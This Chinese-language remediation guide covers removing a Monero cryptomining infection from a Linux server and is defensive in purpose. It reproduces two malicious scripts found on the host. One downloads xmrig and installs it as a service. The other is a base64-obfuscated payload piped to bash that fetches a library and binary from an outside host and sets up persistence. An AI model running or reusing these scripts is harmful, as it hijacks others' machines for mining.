挖矿病毒处理流程(门罗币)
1.检查自启动项
执行systemctl list-unit-files --type=service | grep enabled命令列出全部自启动项,有异常启动项执行systemctl disable A_li_yun_Duns.service删除。A_li_yun_Duns.service为自启动项名称。
2.检查系统用户
执行vi /etc/passwd检查系统用户,如有异常用户将其禁用,执行passwd -l 用户名
3.检查定时任务
执行crontab -e查看定时任务有无默认任务添加进来。若有将其注释掉或删掉。将其执行的脚本文件一起删除。
4.检查根目录有无异常文件
本次根目录下异常文件为wawa.sh、update_udp.sh,以下为wawa.sh脚本内容
#!/bin/bash
cd /root;wget http://zhongcheng-app.oss-cn-beijing.aliyuncs.com/image/image/xmrig-6.21.1-linux-static-x64.tar.gz;tar -zxvf xmrig-6.21.1-linux-static-x64.tar.gz;systemctl stop monero.service;rm -rf /etc/systemd/system/monero.service;wget http://zcapp.oss-cn-beijing.aliyuncs.com/icon/monero.service;sysctl -w vm.nr_hugepages=$((1168+$(nproc)));mv monero.service /etc/systemd/system/monero.service;systemctl daemon-reload;systemctl enable monero.service;systemctl start monero.service
以下为update_udp.sh脚本内容,命令做了base64加密,需要base64解密
#!/bin/bash
echo "IyEvYmluL2Jhc2gKY3VybCAtcyBodHRwOi8vYnBnLXRlc3Qub3NzLWNuLWNoZW5nZHUuYWxpeXVuY3MuY29tL3NDaGFuZ2UvMjAyNC8wMi8yNy9saWJodi5zbyAtbyAvb3B0L2xpYmh2LnNvO2NwIC9vcHQvbGliaHYuc28gL3Vzci9saWIvbGliaHYuc287Y3AgL29wdC9saWJodi5zbyAvdXNyL2xpYjY0L2xpYmh2LnNvO2N1cmwgLXMgaHR0cDovL2JwZy10ZXN0Lm9zcy1jbi1jaGVuZ2R1LmFsaXl1bmNzLmNvbS9zQ2hhbmdlLzIwMjQvMDIvMjcvc3lzZXRtZCAtbyAvb3B0L3N5c2V0bWQ7Y2htb2QgNzc3IC9vcHQvc3lzZXRtZDtjdXJsIC1zIGh0dHA6Ly9icGctdGVzdC5vc3MtY24tY2hlbmdkdS5hbGl5dW5jcy5jb20vc0NoYW5nZS8yMDI0LzAyLzI3L3N5c2V0bWQuc2VydmljZSAtbyAvZXRjL3N5c3RlbWQvc3lzdGVtL3N5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgZGFlbW9uLXJlbG9hZDtzeXN0ZW1jdGwgZW5hYmxlIHN5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgc3RhcnQgc3lzZXRtZC5zZXJ2aWNlOw=="|base64 -di|bash -s
解读脚本内容,将涉及到的文件清除
5.检查/root目录下有无陌生目录
发现xmrig目录清除
6.检查systemctl服务
执行cd /etc/systemd/system,检查该目录下有无异常服务文件,本次异常文件为A_li_yun_Duns.service,伪装成了阿里云安全服务。
处理策略
1.尽量较少对公网开放的端口,尤其是mq的。
2.关闭全部安全组出方向端口,用到哪个开启哪个。挖矿程序需要请求网络领取任务,这样挖矿程序就没任务可执行。